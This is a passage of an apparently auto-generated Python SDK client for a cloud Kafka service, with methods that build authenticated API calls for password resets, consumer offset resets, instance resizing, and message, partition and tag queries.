path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/kafka-manager-password', method='PUT', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ResetManagerPasswordResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def reset_message_offset_async(self, request): """重置消费组消费进度到指定位置 Kafka实例不支持在线重置消费进度。在执行重置消费进度之前,必须停止被重置消费组客户端。 > 在停止被重置消费组客户端后,需要经过ConsumerConfig.SESSION_TIMEOUT_MS_CONFIG配置的时间(默认10000毫秒),服务端才认为消费组客户端真正下线。 :param ResetMessageOffsetRequest request :return: ResetMessageOffsetResponse """ return self.reset_message_offset_with_http_info(request) def reset_message_offset_with_http_info(self, request): """重置消费组消费进度到指定位置 Kafka实例不支持在线重置消费进度。在执行重置消费进度之前,必须停止被重置消费组客户端。 > 在停止被重置消费组客户端后,需要经过ConsumerConfig.SESSION_TIMEOUT_MS_CONFIG配置的时间(默认10000毫秒),服务端才认为消费组客户端真正下线。 :param ResetMessageOffsetRequest request :return: ResetMessageOffsetResponse """ all_params = ['instance_id', 'group', 'reset_message_offset_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'group' in local_var_params: path_params['group'] = local_var_params['group'] query_params = [] header_params = {} form_params = {} body_params 
= None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/groups/{group}/reset-message-offset', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ResetMessageOffsetResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def reset_password_async(self, request): """重置密码 重置密码。 :param ResetPasswordRequest request :return: ResetPasswordResponse """ return self.reset_password_with_http_info(request) def reset_password_with_http_info(self, request): """重置密码 重置密码。 :param ResetPasswordRequest request :return: ResetPasswordResponse """ all_params = ['instance_id', 'reset_password_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/password', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, 
post_params=form_params, response_type='ResetPasswordResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def reset_user_passwrod_async(self, request): """重置用户密码 重置用户密码 :param ResetUserPasswrodRequest request :return: ResetUserPasswrodResponse """ return self.reset_user_passwrod_with_http_info(request) def reset_user_passwrod_with_http_info(self, request): """重置用户密码 重置用户密码 :param ResetUserPasswrodRequest request :return: ResetUserPasswrodResponse """ all_params = ['instance_id', 'user_name', 'reset_user_passwrod_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'user_name' in local_var_params: path_params['user_name'] = local_var_params['user_name'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/users/{user_name}', method='PUT', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ResetUserPasswrodResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def resize_instance_async(self, request): """实例规格变更 实例规格变更。 :param ResizeInstanceRequest request :return: ResizeInstanceResponse """ return self.resize_instance_with_http_info(request) def 
resize_instance_with_http_info(self, request): """实例规格变更 实例规格变更。 :param ResizeInstanceRequest request :return: ResizeInstanceResponse """ all_params = ['instance_id', 'resize_instance_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/extend', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ResizeInstanceResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def restart_manager_async(self, request): """重启Manager 重启Manager。 :param RestartManagerRequest request :return: RestartManagerResponse """ return self.restart_manager_with_http_info(request) def restart_manager_with_http_info(self, request): """重启Manager 重启Manager。 :param RestartManagerRequest request :return: RestartManagerResponse """ all_params = ['instance_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, 
SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/restart-kafka-manager', method='PUT', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='RestartManagerResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_background_task_async(self, request): """查询后台任务管理中的指定记录 查询后台任务管理中的指定记录。 :param ShowBackgroundTaskRequest request :return: ShowBackgroundTaskResponse """ return self.show_background_task_with_http_info(request) def show_background_task_with_http_info(self, request): """查询后台任务管理中的指定记录 查询后台任务管理中的指定记录。 :param ShowBackgroundTaskRequest request :return: ShowBackgroundTaskResponse """ all_params = ['instance_id', 'task_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'task_id' in local_var_params: path_params['task_id'] = local_var_params['task_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/tasks/{task_id}', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, 
response_type='ShowBackgroundTaskResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_ces_hierarchy_async(self, request): """查询实例在CES的监控层级关系 查询实例在CES的监控层级关系。 :param ShowCesHierarchyRequest request :return: ShowCesHierarchyResponse """ return self.show_ces_hierarchy_with_http_info(request) def show_ces_hierarchy_with_http_info(self, request): """查询实例在CES的监控层级关系 查询实例在CES的监控层级关系。 :param ShowCesHierarchyRequest request :return: ShowCesHierarchyResponse """ all_params = ['instance_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/ces-hierarchy', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowCesHierarchyResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_cluster_async(self, request): """查询Kafka集群元数据信息 查询Kafka集群元数据信息。 :param ShowClusterRequest request :return: ShowClusterResponse """ return self.show_cluster_with_http_info(request) def show_cluster_with_http_info(self, request): """查询Kafka集群元数据信息 查询Kafka集群元数据信息。 :param ShowClusterRequest request :return: ShowClusterResponse """ all_params = ['instance_id'] local_var_params = {} for attr in 
request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/cluster', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowClusterResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_coordinators_async(self, request): """查询Kafka实例的协调器信息 查询Kafka实例的协调器信息。 :param ShowCoordinatorsRequest request :return: ShowCoordinatorsResponse """ return self.show_coordinators_with_http_info(request) def show_coordinators_with_http_info(self, request): """查询Kafka实例的协调器信息 查询Kafka实例的协调器信息。 :param ShowCoordinatorsRequest request :return: ShowCoordinatorsResponse """ all_params = ['instance_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( 
resource_path='/v2/{project_id}/instances/{instance_id}/management/coordinators', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowCoordinatorsResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_groups_async(self, request): """查询消费组信息 查询消费组信息。 :param ShowGroupsRequest request :return: ShowGroupsResponse """ return self.show_groups_with_http_info(request) def show_groups_with_http_info(self, request): """查询消费组信息 查询消费组信息。 :param ShowGroupsRequest request :return: ShowGroupsResponse """ all_params = ['instance_id', 'group'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'group' in local_var_params: path_params['group'] = local_var_params['group'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/groups/{group}', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowGroupsResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_instance_async(self, request): """查询指定实例 查询指定实例的详细信息。 :param ShowInstanceRequest request :return: ShowInstanceResponse """ return 
self.show_instance_with_http_info(request) def show_instance_with_http_info(self, request): """查询指定实例 查询指定实例的详细信息。 :param ShowInstanceRequest request :return: ShowInstanceResponse """ all_params = ['instance_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowInstanceResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_instance_extend_product_info_async(self, request): """查询实例的扩容规格列表 查询实例的扩容规格列表。 :param ShowInstanceExtendProductInfoRequest request :return: ShowInstanceExtendProductInfoResponse """ return self.show_instance_extend_product_info_with_http_info(request) def show_instance_extend_product_info_with_http_info(self, request): """查询实例的扩容规格列表 查询实例的扩容规格列表。 :param ShowInstanceExtendProductInfoRequest request :return: ShowInstanceExtendProductInfoResponse """ all_params = ['instance_id', 'type', 'engine'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] if 'type' in 
local_var_params: query_params.append(('type', local_var_params['type'])) if 'engine' in local_var_params: query_params.append(('engine', local_var_params['engine'])) header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/extend', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowInstanceExtendProductInfoResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_instance_messages_async(self, request): """查询消息 查询消息的偏移量和消息内容。 先根据时间戳查询消息的偏移量,再根据偏移量查询消息内容。 :param ShowInstanceMessagesRequest request :return: ShowInstanceMessagesResponse """ return self.show_instance_messages_with_http_info(request) def show_instance_messages_with_http_info(self, request): """查询消息 查询消息的偏移量和消息内容。 先根据时间戳查询消息的偏移量,再根据偏移量查询消息内容。 :param ShowInstanceMessagesRequest request :return: ShowInstanceMessagesResponse """ all_params = ['instance_id', 'topic', 'asc', 'start_time', 'end_time', 'limit', 'offset', 'download', 'message_offset', 'partition'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] if 'topic' in local_var_params: query_params.append(('topic', local_var_params['topic'])) if 'asc' in local_var_params: query_params.append(('asc', local_var_params['asc'])) if 'start_time' in local_var_params: query_params.append(('start_time', 
local_var_params['start_time'])) if 'end_time' in local_var_params: query_params.append(('end_time', local_var_params['end_time'])) if 'limit' in local_var_params: query_params.append(('limit', local_var_params['limit'])) if 'offset' in local_var_params: query_params.append(('offset', local_var_params['offset'])) if 'download' in local_var_params: query_params.append(('download', local_var_params['download'])) if 'message_offset' in local_var_params: query_params.append(('message_offset', local_var_params['message_offset'])) if 'partition' in local_var_params: query_params.append(('partition', local_var_params['partition'])) header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/messages', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowInstanceMessagesResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_instance_topic_detail_async(self, request): """查询Kafka实例Topic详细信息 查询Kafka实例Topic详细信息。 :param ShowInstanceTopicDetailRequest request :return: ShowInstanceTopicDetailResponse """ return self.show_instance_topic_detail_with_http_info(request) def show_instance_topic_detail_with_http_info(self, request): """查询Kafka实例Topic详细信息 查询Kafka实例Topic详细信息。 :param ShowInstanceTopicDetailRequest request :return: ShowInstanceTopicDetailResponse """ all_params = ['instance_id', 'topic'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 
'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'topic' in local_var_params: path_params['topic'] = local_var_params['topic'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/topics/{topic}', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowInstanceTopicDetailResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_instance_users_async(self, request): """查询用户列表 查询用户列表。 Kafka实例开启SASL功能时,才支持多用户管理的功能。 :param ShowInstanceUsersRequest request :return: ShowInstanceUsersResponse """ return self.show_instance_users_with_http_info(request) def show_instance_users_with_http_info(self, request): """查询用户列表 查询用户列表。 Kafka实例开启SASL功能时,才支持多用户管理的功能。 :param ShowInstanceUsersRequest request :return: ShowInstanceUsersResponse """ all_params = ['instance_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( 
resource_path='/v2/{project_id}/instances/{instance_id}/users', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowInstanceUsersResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_kafka_project_tags_async(self, request): """查询项目标签 查询项目标签。 :param ShowKafkaProjectTagsRequest request :return: ShowKafkaProjectTagsResponse """ return self.show_kafka_project_tags_with_http_info(request) def show_kafka_project_tags_with_http_info(self, request): """查询项目标签 查询项目标签。 :param ShowKafkaProjectTagsRequest request :return: ShowKafkaProjectTagsResponse """ all_params = [] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/kafka/tags', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowKafkaProjectTagsResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_kafka_tags_async(self, request): """查询实例标签 查询实例标签。 :param ShowKafkaTagsRequest request :return: ShowKafkaTagsResponse """ return self.show_kafka_tags_with_http_info(request) def show_kafka_tags_with_http_info(self, request): """查询实例标签 查询实例标签。 :param ShowKafkaTagsRequest request :return: ShowKafkaTagsResponse """ all_params = 
['instance_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/kafka/{instance_id}/tags', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowKafkaTagsResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_kafka_topic_partition_diskusage_async(self, request): """查询topic的磁盘存储情况 查询topic在Broker上磁盘占用情况。 :param ShowKafkaTopicPartitionDiskusageRequest request :return: ShowKafkaTopicPartitionDiskusageResponse """ return self.show_kafka_topic_partition_diskusage_with_http_info(request) def show_kafka_topic_partition_diskusage_with_http_info(self, request): """查询topic的磁盘存储情况 查询topic在Broker上磁盘占用情况。 :param ShowKafkaTopicPartitionDiskusageRequest request :return: ShowKafkaTopicPartitionDiskusageResponse """ all_params = ['instance_id', 'min_size', 'top', 'percentage'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] if 'min_size' in local_var_params: query_params.append(('minSize', local_var_params['min_size'])) if 'top' in local_var_params: 
query_params.append(('top', local_var_params['top'])) if 'percentage' in local_var_params: query_params.append(('percentage', local_var_params['percentage'])) header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/topics/diskusage', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowKafkaTopicPartitionDiskusageResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_maintain_windows_async(self, request): """查询维护时间窗时间段 查询维护时间窗开始时间和结束时间。 :param ShowMaintainWindowsRequest request :return: ShowMaintainWindowsResponse """ return self.show_maintain_windows_with_http_info(request) def show_maintain_windows_with_http_info(self, request): """查询维护时间窗时间段 查询维护时间窗开始时间和结束时间。 :param ShowMaintainWindowsRequest request :return: ShowMaintainWindowsResponse """ all_params = [] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/instances/maintain-windows', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, 
response_type='ShowMaintainWindowsResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_messages_async(self, request): """查询分区指定时间段的消息 查询分区指定时间段的消息。 :param ShowMessagesRequest request :return: ShowMessagesResponse """ return self.show_messages_with_http_info(request) def show_messages_with_http_info(self, request): """查询分区指定时间段的消息 查询分区指定时间段的消息。 :param ShowMessagesRequest request :return: ShowMessagesResponse """ all_params = ['instance_id', 'topic', 'start_time', 'end_time', 'limit', 'offset', 'partition'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'topic' in local_var_params: path_params['topic'] = local_var_params['topic'] query_params = [] if 'start_time' in local_var_params: query_params.append(('start_time', local_var_params['start_time'])) if 'end_time' in local_var_params: query_params.append(('end_time', local_var_params['end_time'])) if 'limit' in local_var_params: query_params.append(('limit', local_var_params['limit'])) if 'offset' in local_var_params: query_params.append(('offset', local_var_params['offset'])) if 'partition' in local_var_params: query_params.append(('partition', local_var_params['partition'])) header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/topics/{topic}/messages', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, 
post_params=form_params, response_type='ShowMessagesResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_partition_beginning_message_async(self, request): """查询分区最早消息的位置 查询分区最早消息的位置。 :param ShowPartitionBeginningMessageRequest request :return: ShowPartitionBeginningMessageResponse """ return self.show_partition_beginning_message_with_http_info(request) def show_partition_beginning_message_with_http_info(self, request): """查询分区最早消息的位置 查询分区最早消息的位置。 :param ShowPartitionBeginningMessageRequest request :return: ShowPartitionBeginningMessageResponse """ all_params = ['instance_id', 'topic', 'partition'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'topic' in local_var_params: path_params['topic'] = local_var_params['topic'] if 'partition' in local_var_params: path_params['partition'] = local_var_params['partition'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/topics/{topic}/partitions/{partition}/beginning-message', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowPartitionBeginningMessageResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_partition_end_message_async(self, 
request): """查询分区最新消息的位置 查询分区最新消息的位置。 :param ShowPartitionEndMessageRequest request :return: ShowPartitionEndMessageResponse """ return self.show_partition_end_message_with_http_info(request) def show_partition_end_message_with_http_info(self, request): """查询分区最新消息的位置 查询分区最新消息的位置。 :param ShowPartitionEndMessageRequest request :return: ShowPartitionEndMessageResponse """ all_params = ['instance_id', 'topic', 'partition'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'topic' in local_var_params: path_params['topic'] = local_var_params['topic'] if 'partition' in local_var_params: path_params['partition'] = local_var_params['partition'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/topics/{topic}/partitions/{partition}/end-message', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowPartitionEndMessageResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_partition_message_async(self, request): """查询分区指定偏移量的消息 查询分区指定偏移量的消息。 :param ShowPartitionMessageRequest request :return: ShowPartitionMessageResponse """ return self.show_partition_message_with_http_info(request) def show_partition_message_with_http_info(self, request): """查询分区指定偏移量的消息 查询分区指定偏移量的消息。 :param ShowPartitionMessageRequest request 
:return: ShowPartitionMessageResponse """ all_params = ['instance_id', 'topic', 'partition', 'message_offset'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'topic' in local_var_params: path_params['topic'] = local_var_params['topic'] if 'partition' in local_var_params: path_params['partition'] = local_var_params['partition'] query_params = [] if 'message_offset' in local_var_params: query_params.append(('message_offset', local_var_params['message_offset'])) header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/topics/{topic}/partitions/{partition}/message', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowPartitionMessageResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_sink_task_detail_async(self, request): """查询单个转储任务 查询单个转储任务。 :param ShowSinkTaskDetailRequest request :return: ShowSinkTaskDetailResponse """ return self.show_sink_task_detail_with_http_info(request) def show_sink_task_detail_with_http_info(self, request): """查询单个转储任务 查询单个转储任务。 :param ShowSinkTaskDetailRequest request :return: ShowSinkTaskDetailResponse """ all_params = ['connector_id', 'task_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) 
